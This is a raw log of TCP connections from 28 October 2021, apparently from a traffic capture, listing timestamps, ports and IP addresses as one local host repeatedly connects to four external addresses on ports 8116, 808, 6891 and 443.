Oct 28, 2021 05:26:22.862993002 CEST	8116	49762	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.911901951 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.912803888 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:22.916580915 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:22.916623116 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:22.916762114 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:22.917341948 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:22.917361021 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.098517895 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:23.098532915 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:23.098619938 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:23.101938963 CEST	49763	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:23.159028053 CEST	8116	49763	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:23.217117071 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.217159986 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.217269897 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.217993975 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.218009949 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.408374071 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.408610106 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.409774065 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.409792900 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.436434031 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.436460018 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.436507940 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.436522007 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.725106955 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.725451946 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.726469994 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.726481915 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.732714891 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.732727051 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:23.732897997 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:23.732911110 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.127367020 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.127446890 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.127659082 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:24.134056091 CEST	49764	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:24.134107113 CEST	443	49764	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.293212891 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.417440891 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.417519093 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.417632103 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:24.417689085 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:24.420834064 CEST	49765	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:24.420875072 CEST	443	49765	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:24.451653004 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.452646017 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.452672958 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.592855930 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.611428976 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.611507893 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.611641884 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.612200022 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.628313065 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.628438950 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.756408930 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.756602049 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.757420063 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.769946098 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.786212921 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.786242962 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.786282063 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.920794964 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.920986891 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:24.921092033 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.921679020 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.926037073 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:24.926099062 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:25.085078955 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.089423895 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.089447975 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.089464903 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.089495897 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.166202068 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.166225910 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.166378975 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:25.175286055 CEST	49766	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:25.292346001 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.333345890 CEST	808	49766	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.458487034 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.458586931 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.459301949 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.486366987 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.486386061 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.486459017 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:25.491333961 CEST	49767	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:25.611478090 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.625113010 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.625346899 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.625418901 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.625927925 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.630639076 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.630812883 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.654807091 CEST	808	49767	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:25.777673006 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.777851105 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.778578997 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.796765089 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.796789885 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.835213900 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.944559097 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.944683075 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:25.944745064 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.945272923 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.950753927 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:25.950912952 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:26.116869926 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.116889954 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.155282021 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.180963039 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.180995941 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.181071043 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:26.188357115 CEST	49768	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:26.307982922 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.354432106 CEST	6891	49768	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.361942053 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.362091064 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.362801075 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.416606903 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.417226076 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.417308092 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.417891979 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.422892094 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.423003912 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.477847099 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.496562004 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.496587992 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.496630907 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:26.496659994 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:26.500519991 CEST	49769	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:26.629834890 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.661643982 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.661664963 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.661797047 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.661850929 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.666454077 CEST	6891	49769	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:26.676189899 CEST	49770	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.683139086 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.683264017 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.684366941 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.730021000 CEST	8116	49770	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.737437963 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.737613916 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.737701893 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.738373995 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.744050980 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.744168043 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.792484999 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:26.792532921 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:26.792656898 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:26.793437004 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:26.793466091 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:26.797256947 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.797281027 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.982455969 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.982489109 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:26.983652115 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.983711958 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:26.986027956 CEST	49771	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:27.039251089 CEST	8116	49771	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:27.109242916 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.109287977 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.109400988 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.110131979 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.110146999 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.317200899 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.317312002 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.318177938 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.318192005 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.329376936 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.329396009 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.329603910 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.329634905 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.627310038 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.627471924 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.649060011 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.649080992 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.654459000 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.654479027 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:27.654545069 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:27.654555082 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.038552046 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.038636923 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:28.038645029 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.038695097 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:28.046180010 CEST	49772	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:28.046228886 CEST	443	49772	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.167470932 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.330578089 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.330765963 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.331367016 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.363354921 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.363436937 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.363464117 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:28.363476992 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:28.366437912 CEST	49773	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:28.366466045 CEST	443	49773	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:28.494605064 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.494653940 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.494746923 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.495887041 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.500735998 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.500876904 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.535200119 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:28.658906937 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.663731098 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.663764954 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.663773060 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.693274975 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:28.693487883 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.032816887 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.050733089 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.050793886 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.050856113 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.050904989 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.057794094 CEST	49774	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.168796062 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.191085100 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.192327023 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.192706108 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.193160057 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.224421978 CEST	808	49774	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.277436018 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.277585983 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:29.334955931 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:29.335074902 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.337269068 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.351078987 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.435641050 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.435683966 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.435713053 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.503040075 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:29.503174067 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:29.503262043 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.503845930 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.508629084 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.508717060 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:29.674494028 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:29.674523115 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:29.674540997 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:29.821480036 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.821512938 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:29.821624994 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:30.060431957 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:30.060460091 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:30.060580969 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:30.060621023 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:30.589940071 CEST	49775	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:26:30.597440958 CEST	49776	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:30.715748072 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:30.717026949 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.748332024 CEST	808	49775	143.244.140.214	192.168.2.3
Oct 28, 2021 05:26:30.763405085 CEST	6891	49776	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:30.764415026 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:30.764614105 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.776412010 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.823928118 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:30.824389935 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:30.824489117 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.827212095 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.830702066 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.830883026 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:30.878161907 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:30.878792048 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:30.881951094 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:30.882123947 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:30.886913061 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.048871040 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.048894882 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.049004078 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.049062014 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.052907944 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.053004980 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.053082943 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.053842068 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.057662010 CEST	49778	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.058906078 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.059039116 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.104769945 CEST	8116	49778	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.167632103 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.167680979 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:31.167797089 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.168586016 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.168598890 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:31.225162983 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.225276947 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.604569912 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.604590893 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.604671001 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.604707003 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.607693911 CEST	49777	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:26:31.683270931 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:31.683367014 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.684042931 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.684055090 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:31.699013948 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.699034929 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:31.699193954 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:31.699209929 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:31.734673023 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.773775101 CEST	6891	49777	45.77.0.96	192.168.2.3
Oct 28, 2021 05:26:31.786451101 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.786730051 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.787444115 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.838895082 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.839015961 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.839250088 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.839808941 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.844198942 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.844309092 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:31.895677090 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:31.896462917 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:32.080553055 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:32.080574989 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:32.080739975 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:32.080794096 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:32.083532095 CEST	49780	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:26:32.135077000 CEST	8116	49780	185.56.219.47	192.168.2.3
Oct 28, 2021 05:26:32.202811003 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.202850103 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.202944040 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.203629017 CEST	49781	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.203636885 CEST	443	49781	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.408953905 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.409037113 CEST	443	49779	192.46.210.220	192.168.2.3
Oct 28, 2021 05:26:32.409143925 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.409181118 CEST	49779	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:26:32.416552067 CEST	49779	443	192.168.2.3	192.46.210.220
